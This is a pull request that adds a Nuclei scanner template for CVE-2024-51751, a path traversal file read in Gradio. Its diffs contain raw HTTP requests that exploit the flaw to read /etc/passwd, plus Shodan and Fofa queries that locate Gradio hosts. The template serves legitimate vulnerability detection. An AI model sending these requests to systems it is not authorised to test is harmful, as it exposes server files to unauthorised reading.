### PR TITLE
Create CVE-2024-51751

### DIFF
--- a/code/cves/2024/CVE-2024-51751.yaml
+++ b/code/cves/2024/CVE-2024-51751.yaml
@@ -1,19 +1,29 @@
 id: CVE-2024-51751
 
 info:
-  name: Gradio File Component Arbitrary File Read
-  author: KoYejune0302, gy741
+  name: Gradio File Component - Arbitrary File Read
+  author: KoYejune0302,gy741
   severity: medium
   description: |
     If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.
+  reference:
+    - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhm9-gp5p-5248
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-51751
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.5
     cve-id: CVE-2024-51751
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-51751
-    - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhm9-gp5p-5248
-  tags: cve, cve2024, gradio, file-read
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: html:"__gradio_mode__"
+    product: gradio
+    vendor: gradio_project
+    fofa-query: body="__gradio_mode__"
+  tags: cve,cve2024,gradio,lfi
+
+flow: http(1) && http(2)
 
 http:
   # Pre-condition check: Ensure the server returns {"error":null} for a valid request
@@ -22,7 +32,6 @@ http:
         POST /gradio_api/run/predict HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
-        Content-Length: 245
 
         {
           "data": [
@@ -39,14 +48,15 @@ http:
           "event_data": null,
           "fn_index": 0,
           "trigger_id": 8,
-          "session_hash": "mnv42s5gt7"
+          "session_hash": "aaaaaaaaaaa"
         }
 
     matchers:
       - type: word
+        part: body
         words:
           - '{"error":null}'
-        part: body
+        internal: true
 
   # Vulnerability check: Attempt to read /etc/passwd without the meta field
   - raw:
@@ -54,7 +64,6 @@ http:
         POST /gradio_api/run/predict HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
-        Content-Length: 215
 
         {
           "data": [
@@ -68,11 +77,10 @@ http:
           "event_data": null,
           "fn_index": 0,
           "trigger_id": 8,
-          "session_hash": "mnv42s5gt7"
+          "session_hash": "aaaaaaaaaaa"
         }
 
     matchers:
       - type: regex
         regex:
           - 'root:.*:0:0:'
-        part: body

--- a/code/cves/2024/CVE-2024-51751.yaml
+++ b/code/cves/2024/CVE-2024-51751.yaml
@@ -1,0 +1,86 @@
+id: CVE-2024-51751
+
+info:
+  name: Gradio File Component Arbitrary File Read
+  author: KoYejune0302, gy741
+  severity: high
+  description: |
+    If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2024-51751
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-51751
+    - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhm9-gp5p-5248
+  tags: cve, cve2024, gradio, file-read
+
+http:
+  # Pre-condition check: Ensure the server returns {"error":null} for a valid request
+  - raw:
+      - |
+        POST /gradio_api/run/predict HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Content-Length: 245
+
+        {
+          "data": [
+            {
+              "path": "/tmp/safe_file.txt",
+              "orig_name": "safe_file.txt",
+              "size": 4,
+              "mime_type": "text/plain",
+              "meta": {
+                "_type": "gradio.FileData"
+              }
+            }
+          ],
+          "event_data": null,
+          "fn_index": 0,
+          "trigger_id": 8,
+          "session_hash": "mnv42s5gt7"
+        }
+
+    matchers:
+      - type: word
+        words:
+          - '{"error":null}'
+        part: body
+
+  # Vulnerability check: Attempt to read /etc/passwd without the meta field
+  - raw:
+      - |
+        POST /gradio_api/run/predict HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Content-Length: 215
+
+        {
+          "data": [
+            {
+              "path": "/etc/passwd",
+              "orig_name": "test.txt",
+              "size": 4,
+              "mime_type": "text/plain"
+            }
+          ],
+          "event_data": null,
+          "fn_index": 0,
+          "trigger_id": 8,
+          "session_hash": "mnv42s5gt7"
+        }
+
+    matchers:
+      - type: regex
+        regex:
+          - 'root:.*:0:0:'
+        part: body
+
+    extractors:
+      - type: regex
+        name: passwd_content
+        regex:
+          - 'root:.*:0:0:'
+        part: body
+        group: 1

--- a/code/cves/2024/CVE-2024-51751.yaml
+++ b/code/cves/2024/CVE-2024-51751.yaml
@@ -3,7 +3,7 @@ id: CVE-2024-51751
 info:
   name: Gradio File Component Arbitrary File Read
   author: KoYejune0302, gy741
-  severity: high
+  severity: medium
   description: |
     If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.
   classification:
@@ -76,11 +76,3 @@ http:
         regex:
           - 'root:.*:0:0:'
         part: body
-
-    extractors:
-      - type: regex
-        name: passwd_content
-        regex:
-          - 'root:.*:0:0:'
-        part: body
-        group: 1


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2024-51751
```
If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.
```

- References: 
https://nvd.nist.gov/vuln/detail/CVE-2024-51751

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)